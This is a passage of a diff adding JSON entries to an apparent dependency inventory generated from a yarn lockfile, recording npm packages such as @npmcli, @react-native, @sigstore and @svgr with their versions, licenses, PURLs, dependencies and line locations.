"3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2056, + "EndLine": 2057 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/node-gyp@4.0.0", + "Name": "@npmcli/node-gyp", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/node-gyp@4.0.0", + "UID": "1280873c56cca8c" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2059, + "EndLine": 2060 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/package-json@7.0.1", + "Name": "@npmcli/package-json", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/package-json@7.0.1", + "UID": "601e09b38638788d" + }, + "Version": "7.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/git@7.0.0", + "glob@11.0.3", + "hosted-git-info@9.0.2", + "json-parse-even-better-errors@4.0.0", + "proc-log@5.0.0", + "semver@7.7.3", + "validate-npm-package-license@3.0.4" + ], + "Locations": [ + { + "StartLine": 2062, + "EndLine": 2071 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/promise-spawn@8.0.3", + "Name": "@npmcli/promise-spawn", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/promise-spawn@8.0.3", + "UID": "7ae8d743a351020d" + }, + "Version": "8.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 2073, + "EndLine": 2076 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/query@4.0.1", + "Name": "@npmcli/query", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/query@4.0.1", + "UID": "246684be929a32de" + }, + "Version": "4.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "postcss-selector-parser@7.1.0" + ], + "Locations": [ + { + "StartLine": 2078, + "EndLine": 2081 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/redact@3.2.2", + "Name": "@npmcli/redact", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/redact@3.2.2", + "UID": "42eb53e40e94f87e" + }, + "Version": "3.2.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2083, + "EndLine": 2084 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/run-script@10.0.0", + "Name": "@npmcli/run-script", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/run-script@10.0.0", + "UID": "9b01267ac36e7d06" + }, + "Version": "10.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/node-gyp@4.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/promise-spawn@8.0.3", + "node-gyp@11.4.2", + "proc-log@5.0.0", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 2086, + "EndLine": 2094 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/aspromise@1.1.2", + "Name": "@protobufjs/aspromise", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", + "UID": "2f3df6b54fd354d5" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2101, + "EndLine": 2104 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/base64@1.1.2", + "Name": "@protobufjs/base64", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", + "UID": "8022cb1615e3db6e" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2106, + "EndLine": 2109 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/codegen@2.0.4", + "Name": "@protobufjs/codegen", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/codegen@2.0.4", + "UID": "bcdbd8b14ac9c1f" + }, + "Version": "2.0.4", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2111, + "EndLine": 2114 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/eventemitter@1.1.0", + "Name": "@protobufjs/eventemitter", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", + "UID": "df0f80a183844744" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2116, + "EndLine": 2119 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/fetch@1.1.0", + "Name": "@protobufjs/fetch", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", + "UID": "6c5dbdb00db509f5" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@protobufjs/aspromise@1.1.2", + "@protobufjs/inquire@1.1.0" + ], + "Locations": [ + { + "StartLine": 2121, + "EndLine": 2127 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/float@1.0.2", + "Name": "@protobufjs/float", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/float@1.0.2", + "UID": "7a646071f8d30d85" + }, + "Version": "1.0.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2129, + "EndLine": 2132 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/inquire@1.1.0", + "Name": "@protobufjs/inquire", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/inquire@1.1.0", + "UID": "9294096b2d8a9fad" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2134, + "EndLine": 2137 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/path@1.1.2", + "Name": "@protobufjs/path", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/path@1.1.2", + "UID": "631f8e34b90d69f5" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2139, + "EndLine": 2142 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/pool@1.1.0", + "Name": "@protobufjs/pool", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", + "UID": "d4897049d26fe9a9" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2144, + "EndLine": 2147 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@protobufjs/utf8@1.1.0", + "Name": "@protobufjs/utf8", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/utf8@1.1.0", + "UID": "9dc5dd41539a0503" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2149, + "EndLine": 2152 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/cli-config-android@18.0.0", + "Name": "@react-native-community/cli-config-android", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config-android@18.0.0", + "UID": "5377857a5d32b12b" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@18.0.0", + "chalk@4.1.2", + "fast-glob@3.3.3", + "fast-xml-parser@4.5.3" + ], + "Locations": [ + { + "StartLine": 2181, + "EndLine": 2189 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/cli-config-apple@18.0.0", + "Name": "@react-native-community/cli-config-apple", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config-apple@18.0.0", + "UID": "2c398df1cc29133c" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@18.0.0", + "chalk@4.1.2", + "execa@5.1.1", + "fast-glob@3.3.3" + ], + "Locations": [ + { + "StartLine": 2201, + "EndLine": 2209 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/cli-tools@18.0.0", + "Name": "@react-native-community/cli-tools", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-tools@18.0.0", + "UID": "6a3789b84ab0c7d5" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@vscode/sudo-prompt@9.3.1", + "appdirsjs@1.2.7", + "chalk@4.1.2", + "execa@5.1.1", + "find-up@5.0.0", + "launch-editor@2.11.1", + "mime@2.6.0", + "ora@5.4.1", + "prompts@2.4.2", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 2299, + "EndLine": 2313 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/assets-registry@0.81.0", + "Name": "@react-native/assets-registry", + "Identifier": { + "PURL": "pkg:npm/%40react-native/assets-registry@0.81.0", + "UID": "d3e05c8ef9c4f324" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2412, + "EndLine": 2415 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/codegen@0.81.0", + "Name": "@react-native/codegen", + "Identifier": { + "PURL": "pkg:npm/%40react-native/codegen@0.81.0", + "UID": "76216d685201fd8f" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "glob@7.2.3", + "hermes-parser@0.29.1", + "invariant@2.2.4", + "nullthrows@1.1.1", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 2476, + "EndLine": 2485 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/community-cli-plugin@0.81.0", + "Name": "@react-native/community-cli-plugin", + "Identifier": { + "PURL": "pkg:npm/%40react-native/community-cli-plugin@0.81.0", + "UID": "1dbc59a7c7400284" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native/dev-middleware@0.81.0", + "debug@4.4.3", + "invariant@2.2.4", + "metro@0.83.3", + "metro-config@0.83.3", + "metro-core@0.83.3", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 2487, + "EndLine": 2498 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/debugger-frontend@0.81.0", + "Name": "@react-native/debugger-frontend", + "Identifier": { + "PURL": "pkg:npm/%40react-native/debugger-frontend@0.81.0", + "UID": "a236c31cf29efefc" + }, + "Version": "0.81.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2500, + "EndLine": 2503 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/dev-middleware@0.81.0", + "Name": "@react-native/dev-middleware", + "Identifier": { + "PURL": "pkg:npm/%40react-native/dev-middleware@0.81.0", + "UID": "7d7e8981544710bf" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/ttlcache@1.4.1", + "@react-native/debugger-frontend@0.81.0", + "chrome-launcher@0.15.2", + "chromium-edge-launcher@0.2.0", + "connect@3.7.0", + "debug@4.4.3", + "invariant@2.2.4", + "nullthrows@1.1.1", + "open@7.4.2", + "serve-static@1.16.2", + "ws@6.2.3" + ], + "Locations": [ + { + "StartLine": 2505, + "EndLine": 2520 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/gradle-plugin@0.81.0", + "Name": "@react-native/gradle-plugin", + "Identifier": { + "PURL": "pkg:npm/%40react-native/gradle-plugin@0.81.0", + "UID": "1c676cdcc4c728a" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2545, + "EndLine": 2548 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/js-polyfills@0.81.0", + "Name": "@react-native/js-polyfills", + "Identifier": { + "PURL": "pkg:npm/%40react-native/js-polyfills@0.81.0", + "UID": "f03605cfe61c89f4" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2550, + "EndLine": 2553 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/normalize-colors@0.73.2", + "Name": "@react-native/normalize-colors", + "Identifier": { + "PURL": "pkg:npm/%40react-native/normalize-colors@0.73.2", + "UID": "bc0ea1e933b8c969" + }, + "Version": "0.73.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2580, + "EndLine": 2583 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/normalize-colors@0.81.0", + "Name": "@react-native/normalize-colors", + "Identifier": { + "PURL": "pkg:npm/%40react-native/normalize-colors@0.81.0", + "UID": "31c7f3e2978509a0" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2585, + "EndLine": 2588 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native/virtualized-lists@0.81.0", + "Name": "@react-native/virtualized-lists", + "Identifier": { + "PURL": "pkg:npm/%40react-native/virtualized-lists@0.81.0", + "UID": "c973774c0fe413e3" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "invariant@2.2.4", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 2595, + "EndLine": 2601 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/core@7.17.1", + "Name": "@react-navigation/core", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/core@7.17.1", + "UID": "47aa15320c981e2a" + }, + "Version": "7.17.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-navigation/routers@7.5.3", + "escape-string-regexp@4.0.0", + "fast-deep-equal@3.1.3", + "nanoid@3.3.11", + "query-string@7.1.3", + "react-is@19.2.4", + "use-latest-callback@0.2.5", + "use-sync-external-store@1.6.0" + ], + "Locations": [ + { + "StartLine": 2603, + "EndLine": 2615 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/elements@2.9.13", + "Name": "@react-navigation/elements", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/elements@2.9.13", + "UID": "9f7f1c669a07f6e7" + }, + "Version": "2.9.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color@4.2.3", + "use-latest-callback@0.2.5", + "use-sync-external-store@1.6.0" + ], + "Locations": [ + { + "StartLine": 2627, + "EndLine": 2634 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-navigation/routers@7.5.3", + "Name": "@react-navigation/routers", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/routers@7.5.3", + "UID": "bb3f706e42b51d6a" + }, + "Version": "7.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "nanoid@3.3.11" + ], + "Locations": [ + { + "StartLine": 2656, + "EndLine": 2661 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sigstore/bundle@4.0.0", + "Name": "@sigstore/bundle", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/bundle@4.0.0", + "UID": "fdc0a5c8c1d83c2c" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/protobuf-specs@0.5.0" + ], + "Locations": [ + { + "StartLine": 2688, + "EndLine": 2693 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sigstore/core@3.0.0", + "Name": "@sigstore/core", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/core@3.0.0", + "UID": "f715328e030b255b" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2695, + "EndLine": 2696 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sigstore/protobuf-specs@0.5.0", + "Name": "@sigstore/protobuf-specs", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/protobuf-specs@0.5.0", + "UID": "39a6fd9ffc663d37" + }, + "Version": "0.5.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2698, + "EndLine": 2701 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sigstore/sign@4.0.1", + "Name": "@sigstore/sign", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/sign@4.0.1", + "UID": "257eaee4e160ae2c" + }, + "Version": "4.0.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/bundle@4.0.0", + "@sigstore/core@3.0.0", + "@sigstore/protobuf-specs@0.5.0", + "make-fetch-happen@15.0.2", + "proc-log@5.0.0", + "promise-retry@2.0.1" + ], + "Locations": [ + { + "StartLine": 2703, + "EndLine": 2711 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sigstore/tuf@4.0.0", + "Name": "@sigstore/tuf", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/tuf@4.0.0", + "UID": "5a4831c7e9e267b2" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/protobuf-specs@0.5.0", + "tuf-js@4.0.0" + ], + "Locations": [ + { + "StartLine": 2713, + "EndLine": 2717 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sigstore/verify@3.0.0", + "Name": "@sigstore/verify", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/verify@3.0.0", + "UID": "82dcdb5c3b8bd0d2" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/bundle@4.0.0", + "@sigstore/core@3.0.0", + "@sigstore/protobuf-specs@0.5.0" + ], + "Locations": [ + { + "StartLine": 2719, + "EndLine": 2724 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sinclair/typebox@0.27.8", + "Name": "@sinclair/typebox", + "Identifier": { + "PURL": "pkg:npm/%40sinclair/typebox@0.27.8", + "UID": "a2c7f773ff725a1b" + }, + "Version": "0.27.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2726, + "EndLine": 2729 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sinonjs/commons@3.0.1", + "Name": "@sinonjs/commons", + "Identifier": { + "PURL": "pkg:npm/%40sinonjs/commons@3.0.1", + "UID": "8058503cd053a6ee" + }, + "Version": "3.0.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "type-detect@4.0.8" + ], + "Locations": [ + { + "StartLine": 2731, + "EndLine": 2736 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@sinonjs/fake-timers@10.3.0", + "Name": "@sinonjs/fake-timers", + "Identifier": { + "PURL": "pkg:npm/%40sinonjs/fake-timers@10.3.0", + "UID": "6d87858e0c014694" + }, + "Version": "10.3.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sinonjs/commons@3.0.1" + ], + "Locations": [ + { + "StartLine": 2738, + "EndLine": 2743 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-add-jsx-attribute@8.0.0", + "Name": "@svgr/babel-plugin-add-jsx-attribute", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-add-jsx-attribute@8.0.0", + "UID": "a6a90f93b05e2ff1" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2745, + "EndLine": 2748 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", + "Name": "@svgr/babel-plugin-remove-jsx-attribute", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-attribute@8.0.0", + "UID": "3b504694c2f30024" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2750, + "EndLine": 2753 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", + "Name": "@svgr/babel-plugin-remove-jsx-empty-expression", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", + "UID": "704500cb2afa3143" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2755, + "EndLine": 2758 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", + "Name": "@svgr/babel-plugin-replace-jsx-attribute-value", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", + "UID": "593997112d7157e9" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2760, + "EndLine": 2763 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-svg-dynamic-title@8.0.0", + "Name": "@svgr/babel-plugin-svg-dynamic-title", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-svg-dynamic-title@8.0.0", + "UID": "a6fc85e19612f1e6" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2765, + "EndLine": 2768 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-svg-em-dimensions@8.0.0", + "Name": "@svgr/babel-plugin-svg-em-dimensions", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-svg-em-dimensions@8.0.0", + "UID": "be233c079cd8711b" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2770, + "EndLine": 2773 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-transform-react-native-svg@8.1.0", + "Name": "@svgr/babel-plugin-transform-react-native-svg", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-transform-react-native-svg@8.1.0", + "UID": "ec761ff01b67bc16" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2775, + "EndLine": 2778 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-plugin-transform-svg-component@8.0.0", + "Name": "@svgr/babel-plugin-transform-svg-component", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-transform-svg-component@8.0.0", + "UID": "b964f3b84122a1f6" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2780, + "EndLine": 2783 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/babel-preset@8.1.0", + "Name": "@svgr/babel-preset", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-preset@8.1.0", + "UID": "73179374b8c54c53" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@svgr/babel-plugin-add-jsx-attribute@8.0.0", + "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", + "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", + "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", + "@svgr/babel-plugin-svg-dynamic-title@8.0.0", + "@svgr/babel-plugin-svg-em-dimensions@8.0.0", + "@svgr/babel-plugin-transform-react-native-svg@8.1.0", + "@svgr/babel-plugin-transform-svg-component@8.0.0" + ], + "Locations": [ + { + "StartLine": 2785, + "EndLine": 2797 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/core@8.1.0", + "Name": "@svgr/core", + "Identifier": { + "PURL": "pkg:npm/%40svgr/core@8.1.0", + "UID": "7492ec3dffa26d0e" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@svgr/babel-preset@8.1.0", + "camelcase@6.3.0", + "cosmiconfig@8.3.6", + "snake-case@3.0.4" + ], + "Locations": [ + { + "StartLine": 2799, + "EndLine": 2808 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/hast-util-to-babel-ast@8.0.0", + "Name": "@svgr/hast-util-to-babel-ast", + "Identifier": { + "PURL": "pkg:npm/%40svgr/hast-util-to-babel-ast@8.0.0", + "UID": "748d2c3187817806" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4", + "entities@4.5.0" + ], + "Locations": [ + { + "StartLine": 2810, + "EndLine": 2816 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/plugin-jsx@8.1.0", + "Name": "@svgr/plugin-jsx", + "Identifier": { + "PURL": "pkg:npm/%40svgr/plugin-jsx@8.1.0", + "UID": "98486a121c9db39c" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@svgr/babel-preset@8.1.0", + "@svgr/hast-util-to-babel-ast@8.0.0", + "svg-parser@2.0.4" + ], + "Locations": [ + { + "StartLine": 2818, + "EndLine": 2826 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@svgr/plugin-svgo@8.1.0", + "Name": "@svgr/plugin-svgo", + "Identifier": { + "PURL": "pkg:npm/%40svgr/plugin-svgo@8.1.0", + "UID": "c49d4a6af035c833" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cosmiconfig@8.3.6", + "deepmerge@4.3.1", + "svgo@3.3.2" + ], + "Locations": [ + { + "StartLine": 2828, + "EndLine": 2835 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@trysound/sax@0.2.0", + "Name": "@trysound/sax", + "Identifier": { + "PURL": "pkg:npm/%40trysound/sax@0.2.0", + "UID": "37b619dbd22dcbb4" + }, + "Version": "0.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2842, + "EndLine": 2845 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@tufjs/canonical-json@2.0.0", + "Name": "@tufjs/canonical-json", + "Identifier": { + "PURL": "pkg:npm/%40tufjs/canonical-json@2.0.0", + "UID": "eda9e081767daad3" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2847, + "EndLine": 2850 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@tufjs/models@4.0.0", + "Name": "@tufjs/models", + "Identifier": { + "PURL": "pkg:npm/%40tufjs/models@4.0.0", + "UID": "8e8d04160d29d4a7" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@tufjs/canonical-json@2.0.0", + "minimatch@9.0.5" + ], + "Locations": [ + { + "StartLine": 2852, + "EndLine": 2856 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/babel__core@7.20.5", + "Name": "@types/babel__core", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__core@7.20.5", + "UID": "c8d4aeb1ed9c55c8" + }, + "Version": "7.20.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/parser@7.28.4", + "@babel/types@7.28.4", + "@types/babel__generator@7.27.0", + "@types/babel__template@7.4.4", + "@types/babel__traverse@7.28.0" + ], + "Locations": [ + { + "StartLine": 2858, + "EndLine": 2867 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/babel__generator@7.27.0", + "Name": "@types/babel__generator", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__generator@7.27.0", + "UID": "1fbd0e1463860d0a" + }, + "Version": "7.27.0", + "Licenses": [ + 